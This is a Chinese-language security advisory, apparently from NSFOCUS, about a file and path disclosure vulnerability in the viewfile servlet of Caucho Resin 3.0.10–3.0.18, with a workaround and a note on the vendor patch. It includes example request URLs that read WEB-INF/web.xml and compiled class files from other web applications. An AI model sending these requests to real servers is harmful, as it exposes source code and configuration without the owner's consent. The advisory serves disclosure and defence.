首页 -> 安全研究

安全研究

安全漏洞
Caucho Resin viewfile远程文件及路径泄露漏洞

发布日期:2006-05-16
更新日期:2006-05-17

受影响系统:
Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10
不受影响系统:
Caucho Technology Resin v3.0.19
描述:
BUGTRAQ  ID: 18007

Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。

Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。

默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:

http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight

viewfile servlet可以无需参数在Web主目录中浏览任意文件:

http://targetsystem/resin-doc/viewfile/?file=index.jsp

攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:

http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml

如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:

http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class

请求中错误的路径还会泄漏安装的绝对路径:

File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class

<*来源:Joseph Pierini (joep@scanalert.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114780293620632&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&amp;servletpath=&amp;file=WEB-INF/web.xml
http://www.example.com/resin-doc/viewfile/?contextpath=/&amp;servletpath=&amp;file=WEB-INF/classes/com/webapp/app/target.class

建议:
临时解决方法:

* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。

厂商补丁:

Caucho Technology
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.caucho.com/download/

浏览次数:7254
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障